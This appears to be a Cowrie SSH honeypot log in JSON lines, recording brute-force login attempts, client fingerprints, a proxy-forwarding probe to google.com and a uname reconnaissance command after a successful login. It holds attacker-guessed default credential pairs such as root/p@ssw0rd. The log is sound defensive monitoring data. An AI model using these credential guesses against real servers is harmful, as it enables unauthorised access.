{"eventid":"cowrie.login.failed","username":"tty0","password":"tty0","message":"login attempt [tty0/tty0] failed","sensor":"my-vps","timestamp":"2025-08-26T11:37:17.704250Z","src_ip":"212.227.125.160","session":"9975115010c3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:18.758277Z","src_ip":"212.227.125.160","session":"9975115010c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59360,"dst_ip":"1.2.3.4","dst_port":22,"session":"322133b915a3","protocol":"ssh","message":"New connection: 212.227.125.160:59360 (1.2.3.4:22) [session: 322133b915a3]","sensor":"my-vps","timestamp":"2025-08-26T11:37:22.801864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:37:22.802647Z","src_ip":"212.227.125.160","session":"322133b915a3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:37:22.854125Z","src_ip":"212.227.125.160","session":"322133b915a3"}
{"eventid":"cowrie.login.failed","username":"user6","password":"user6","message":"login attempt [user6/user6] failed","sensor":"my-vps","timestamp":"2025-08-26T11:37:23.004882Z","src_ip":"212.227.125.160","session":"322133b915a3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:24.057591Z","src_ip":"212.227.125.160","session":"322133b915a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60132,"dst_ip":"1.2.3.4","dst_port":22,"session":"d80f5719096d","protocol":"ssh","message":"New connection: 212.227.125.160:60132 (1.2.3.4:22) [session: d80f5719096d]","sensor":"my-vps","timestamp":"2025-08-26T11:37:28.631451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:37:28.632918Z","src_ip":"212.227.125.160","session":"d80f5719096d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:37:28.688829Z","src_ip":"212.227.125.160","session":"d80f5719096d"}
{"eventid":"cowrie.login.failed","username":"cxvqo","password":"cxvqo","message":"login attempt [cxvqo/cxvqo] failed","sensor":"my-vps","timestamp":"2025-08-26T11:37:28.905921Z","src_ip":"212.227.125.160","session":"d80f5719096d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:30.083210Z","src_ip":"212.227.125.160","session":"d80f5719096d"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":37390,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a26b5f66dc7","protocol":"ssh","message":"New connection: 83.168.105.65:37390 (1.2.3.4:22) [session: 3a26b5f66dc7]","sensor":"my-vps","timestamp":"2025-08-26T11:37:30.791703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:37:30.792392Z","src_ip":"83.168.105.65","session":"3a26b5f66dc7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:37:30.828242Z","src_ip":"83.168.105.65","session":"3a26b5f66dc7"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic123","message":"login attempt [elastic/elastic123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:37:30.936768Z","src_ip":"83.168.105.65","session":"3a26b5f66dc7"}
{"eventid":"cowrie.session.connect","src_ip":"175.110.65.134","src_port":16673,"dst_ip":"1.2.3.4","dst_port":22,"session":"0caa2f015b8b","protocol":"ssh","message":"New connection: 175.110.65.134:16673 (1.2.3.4:22) [session: 0caa2f015b8b]","sensor":"my-vps","timestamp":"2025-08-26T11:37:31.110445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-26T11:37:31.111671Z","src_ip":"175.110.65.134","session":"0caa2f015b8b"}
{"eventid":"cowrie.client.kex","hassh":"14b2ddda386a4d1006108ccd231b42fc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 14b2ddda386a4d1006108ccd231b42fc","sensor":"my-vps","timestamp":"2025-08-26T11:37:31.136696Z","src_ip":"175.110.65.134","session":"0caa2f015b8b"}
{"eventid":"cowrie.login.success","username":"root","password":"0","message":"login attempt [root/0] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:37:31.236663Z","src_ip":"175.110.65.134","session":"0caa2f015b8b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"google.com","dst_port":80,"src_ip":"175.110.65.134","src_port":8082,"message":"direct-tcp connection request to google.com:80 from 127.0.0.1:8082","sensor":"my-vps","timestamp":"2025-08-26T11:37:31.262885Z","session":"0caa2f015b8b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"google.com","dst_port":80,"data":"b'GET / HTTP/1.1\\r\\nUser-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to google.com:80 with data b'GET / HTTP/1.1\\r\\nUser-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T11:37:31.289072Z","src_ip":"175.110.65.134","session":"0caa2f015b8b"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:31.315055Z","src_ip":"175.110.65.134","session":"0caa2f015b8b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:31.974808Z","src_ip":"83.168.105.65","session":"3a26b5f66dc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60902,"dst_ip":"1.2.3.4","dst_port":22,"session":"de471d4e5a5e","protocol":"ssh","message":"New connection: 212.227.125.160:60902 (1.2.3.4:22) [session: de471d4e5a5e]","sensor":"my-vps","timestamp":"2025-08-26T11:37:34.349161Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:37:34.350403Z","src_ip":"212.227.125.160","session":"de471d4e5a5e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:37:34.402913Z","src_ip":"212.227.125.160","session":"de471d4e5a5e"}
{"eventid":"cowrie.login.failed","username":"sem8","password":"sem8","message":"login attempt [sem8/sem8] failed","sensor":"my-vps","timestamp":"2025-08-26T11:37:34.564007Z","src_ip":"212.227.125.160","session":"de471d4e5a5e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:35.628880Z","src_ip":"212.227.125.160","session":"de471d4e5a5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33440,"dst_ip":"1.2.3.4","dst_port":22,"session":"d71cb5f190f9","protocol":"ssh","message":"New connection: 212.227.125.160:33440 (1.2.3.4:22) [session: d71cb5f190f9]","sensor":"my-vps","timestamp":"2025-08-26T11:37:40.318596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:37:40.319798Z","src_ip":"212.227.125.160","session":"d71cb5f190f9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:37:40.372190Z","src_ip":"212.227.125.160","session":"d71cb5f190f9"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-26T11:37:40.536143Z","src_ip":"212.227.125.160","session":"d71cb5f190f9"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:41.589892Z","src_ip":"212.227.125.160","session":"d71cb5f190f9"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":36520,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7901ae8dc2b","protocol":"ssh","message":"New connection: 196.251.86.249:36520 (1.2.3.4:22) [session: b7901ae8dc2b]","sensor":"my-vps","timestamp":"2025-08-26T11:37:41.812136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:37:42.612707Z","src_ip":"196.251.86.249","session":"b7901ae8dc2b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:37:42.613394Z","src_ip":"196.251.86.249","session":"b7901ae8dc2b"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123321","message":"login attempt [hadoop/123321] failed","sensor":"my-vps","timestamp":"2025-08-26T11:37:44.722936Z","src_ip":"196.251.86.249","session":"b7901ae8dc2b"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:46.280005Z","src_ip":"196.251.86.249","session":"b7901ae8dc2b"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":54916,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e95bf5681aa","protocol":"ssh","message":"New connection: 83.168.105.65:54916 (1.2.3.4:22) [session: 5e95bf5681aa]","sensor":"my-vps","timestamp":"2025-08-26T11:37:46.362077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:37:46.363365Z","src_ip":"83.168.105.65","session":"5e95bf5681aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34200,"dst_ip":"1.2.3.4","dst_port":22,"session":"641660600a54","protocol":"ssh","message":"New connection: 212.227.125.160:34200 (1.2.3.4:22) [session: 641660600a54]","sensor":"my-vps","timestamp":"2025-08-26T11:37:46.368823Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:37:46.392080Z","src_ip":"212.227.125.160","session":"641660600a54"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:37:46.398938Z","src_ip":"83.168.105.65","session":"5e95bf5681aa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:37:46.419355Z","src_ip":"212.227.125.160","session":"641660600a54"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd","message":"login attempt [root/p@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:37:46.507281Z","src_ip":"83.168.105.65","session":"5e95bf5681aa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:37:46.599033Z","src_ip":"83.168.105.65","session":"5e95bf5681aa"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:37:46.599754Z","src_ip":"83.168.105.65","session":"5e95bf5681aa"}
{"eventid":"cowrie.login.failed","username":"jms","password":"111111","message":"login attempt [jms/111111] failed","sensor":"my-vps","timestamp":"2025-08-26T11:37:46.614573Z","src_ip":"212.227.125.160","session":"641660600a54"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:46.636399Z","src_ip":"83.168.105.65","session":"5e95bf5681aa"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:37:46.637770Z","src_ip":"83.168.105.65","session":"5e95bf5681aa"}
